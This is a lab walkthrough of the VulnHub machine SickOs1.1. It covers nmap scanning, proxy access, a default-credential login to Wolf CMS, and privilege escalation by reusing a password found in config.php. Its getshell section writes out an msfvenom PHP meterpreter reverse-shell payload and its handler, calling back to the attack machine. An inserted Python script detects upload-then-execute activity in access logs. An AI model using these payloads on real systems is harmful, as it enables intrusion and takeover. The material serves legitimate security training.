VulnHub target machine: SickOs1.1
Download address: https://www.vulnhub.com/entry/sickos-11,132/
After downloading the target machine, open it under VMware Workstation and configure the network card as bridged.
Task: Elevate privileges and obtain the flag
Attack machine: Kali Linux 192.168.8.195
Target machine: 192.168.8.194
1. Information collection
Use nmap to discover live hosts and find the target machine.
Command: nmap -sP 192.168.8.0/24
Use nmap to scan the open ports of the target machine. Ports 22, 3128, and 8080 are open, and the output indicates that port 3128 has to be used as a proxy for access.
Command: nmap -A -p- 192.168.8.194
Set the proxy to 192.168.8.194:3128 and access 192.168.8.194. Looking at the page source, no useful information was found.
Try to access robots.txt; it leads to /wolfcms, so you can visit http://192.168.8.194/wolfcms. Wolf CMS is a lightweight CMS program written in PHP. The admin (back-end) entrance is http://192.168.8.194/wolfcms/?/admin/login.
The default user name and password of wolfcms are admin and admin respectively. Try to log in; the login succeeds, and a file upload location is found on the page.
2. Getshell
Here the file upload is chosen to get a shell. The method: generate a payload with msfvenom, listen with msfconsole, then upload the file and execute it to get the shell.
Start the listener in msfconsole, where lhost is set to the IP of the attack machine and lport can be any listening port.
Command:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.8.195
set lport 4444
run
Use msfvenom to generate the payload and copy it into a PHP file; here it is copied to slow.php.
Command: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.8.195 lport=4444 -f raw
-p: select a payload
-f: output format; raw is selected here. Raw is a native format with only data in it.
After uploading slow.php, visit public and execute slow.php; the shell is obtained successfully.
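The upload-then-execute step above leaves a clear trace in the web server's access log. The following is an added example, not part of the original write-up, that flags script files served from the upload directory and records whether the same client had posted to the admin login. The /wolfcms/public/ path, the access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed layout: Wolf CMS under /wolfcms/, uploads served from /wolfcms/public/.
UPLOAD_DIR = "/wolfcms/public/"
LOGIN_PATH = "/wolfcms/?/admin/login"
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

# Apache/nginx common or combined access-log line (assumed format).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_upload_execution(lines):
    """Return alerts for script files served from the upload directory.

    Each alert records whether the same client also POSTed to the admin
    login earlier in the log, which raises confidence in the finding.
    """
    logged_in = defaultdict(bool)
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than fail
        ip, method, url, status = m["ip"], m["method"], m["url"], int(m["status"])
        path = url.split("?", 1)[0].lower()
        if method == "POST" and url.startswith(LOGIN_PATH):
            logged_in[ip] = True
        elif path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXT) and status < 400:
            alerts.append({"ip": ip, "time": m["ts"], "path": path,
                           "admin_login_seen": logged_in[ip]})
    return alerts

# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = [
    '192.168.8.195 - - [01/Jan/2024:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 45',
    '192.168.8.195 - - [01/Jan/2024:10:01:10 +0000] "POST /wolfcms/?/admin/login HTTP/1.1" 302 0',
    '192.168.8.195 - - [01/Jan/2024:10:05:42 +0000] "GET /wolfcms/public/slow.php HTTP/1.1" 200 0',
    '192.168.8.50 - - [01/Jan/2024:10:06:00 +0000] "GET /wolfcms/public/images/logo.png HTTP/1.1" 200 2048',
    '192.168.8.50 - - [01/Jan/2024:10:07:00 +0000] "GET /wolfcms/public/old.php HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for alert in find_upload_execution(SAMPLE_LOG):
        print(alert)
```

Because this site is reached through the proxy on port 3128, the client field in the web server's log may show the proxy rather than the real source, so the per-IP correlation should be treated as a hint rather than proof.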
3. Privilege escalation
Use Python to enter a pseudo-terminal.
Check the Wolf CMS configuration file config.php; a user name and password can be found there. Try to use them to log in as root, but the login fails. Check /etc/passwd and find sickos. The default id of the first user added in Linux is 1000, and sickos is that first user.
Try to log in as sickos; the login succeeds.
Log in to root from the sickos user.
After successfully logging in, find the flag in the /root directory. At this point, the target machine is complete.